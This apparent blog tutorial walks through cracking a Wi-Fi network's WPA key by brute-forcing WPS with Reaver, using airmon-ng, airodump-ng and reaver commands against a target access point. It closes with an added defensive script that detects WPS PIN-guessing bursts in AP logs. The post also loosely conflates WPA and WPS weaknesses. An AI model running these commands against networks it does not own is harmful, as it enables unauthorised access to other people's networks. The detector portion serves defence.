In the previous post we discussed that WEP (Wired Equivalent Privacy/Wireless Encryption Protocol) is a less secure mechanism because it uses a static key for encryption, so we were able to crack it within a few minutes.

After WEP came WPA (Wi-Fi Protected Access) for wireless protection. WPA uses the Temporal Key Integrity Protocol (TKIP) for encryption. With TKIP, the encryption key changes with every data packet, message integrity is checked, and unique keys are generated for each wireless client. That makes WPA more secure than WEP encryption.

But this doesn't mean that WPA is 100% secure. There are some ways to crack a WPA key as well.

1. Brute Force attack

2. Dictionary Attack

If someone uses a dictionary word as the WPA passphrase, the easy way of cracking it is a “dictionary” attack. But if it is a random key, “brute force” will be the easiest way of cracking it, though this takes a few hours.

Here we are talking about a brute-force attack against Wi-Fi Protected Setup (WPS) using a tool called “Reaver”. Reaver is installed in BackTrack 5.

1. Configure your Wireless card into monitor mode

# airmon-ng start wlan0

2. Use airodump-ng to get the BSSID of the target AP

# airodump-ng mon0 (mon0 is the monitor mode interface)

3. Run Reaver with the following command

# reaver -i mon0 -b BSSID

Example:

# reaver -i mon0 -b 00:0E:2E:C9:57:C6

Here you can add some parameters to speed up the attack, as below:

# reaver -i mon0 -b 00:0E:2E:C9:57:C6 -vv --dh-small








Your part is over now. Wait until Reaver cracks the WPA key. Normally this will take 4 to 10 hours.

95.45% complete…

Here we found the WPA passphrase key.
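
Seen from the access point, a WPS brute-force run that lasts for hours shows up as a long, closely spaced series of failed WPS exchanges. The following is an added example, not part of the original post: a small detector that clusters such failures in an AP log and reports sustained episodes. The log lines are constructed; the event names are modelled on hostapd's WPS-FAIL and WPS-AP-SETUP-LOCKED events, while the line layout, the function name and the thresholds are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample AP log. The event names follow hostapd's WPS-FAIL and
# WPS-AP-SETUP-LOCKED events; the timestamp/interface prefix is an assumption.
SAMPLE_LOG = """\
2024-01-01T09:15:10 wlan0: WPS-FAIL msg=8 config_error=18
2024-01-01T21:00:05 wlan0: WPS-FAIL msg=8 config_error=18
2024-01-01T21:00:35 wlan0: WPS-FAIL msg=8 config_error=18
2024-01-01T21:01:05 wlan0: WPS-FAIL msg=8 config_error=18
2024-01-01T21:01:35 wlan0: WPS-FAIL msg=8 config_error=18
2024-01-01T21:02:05 wlan0: WPS-FAIL msg=8 config_error=18
2024-01-01T21:02:06 wlan0: WPS-AP-SETUP-LOCKED
2024-01-01T21:02:40 wlan0: AP-STA-CONNECTED 02:00:00:00:00:01
"""
LINE_RE = re.compile(r"^(\S+) (\S+): (WPS-FAIL|WPS-AP-SETUP-LOCKED)\b")

def find_wps_pin_guessing(lines, min_failures=5, max_gap=timedelta(minutes=5)):
    """Group WPS failures into episodes (gaps <= max_gap) per interface and
    return the episodes with at least min_failures failed exchanges."""
    open_eps, alerts = {}, []

    def close(ep):
        if ep["failures"] >= min_failures:
            alerts.append(ep)

    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line
        ts, iface, event = datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)
        ep = open_eps.get(iface)
        if ep and ts - ep["end"] > max_gap:
            close(open_eps.pop(iface))  # quiet period: the episode is over
            ep = None
        if event == "WPS-FAIL":
            if ep is None:
                ep = open_eps[iface] = {"iface": iface, "start": ts, "end": ts,
                                        "failures": 0, "locked": False}
            ep["failures"] += 1
            ep["end"] = ts
        elif ep is not None:
            ep["locked"] = True  # the AP's own lockout fired during the episode
    for ep in open_eps.values():
        close(ep)
    return alerts

if __name__ == "__main__":
    for a in find_wps_pin_guessing(SAMPLE_LOG.splitlines()):
        print(f'{a["iface"]}: {a["failures"]} WPS failures '
              f'{a["start"]} to {a["end"]}, AP locked: {a["locked"]}')
```

A single mistyped PIN (the 09:15 line) stays below the threshold, while the evening burst is reported as one episode. Turning off the WPS PIN method on the access point removes the exposure altogether.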

Download Reaver

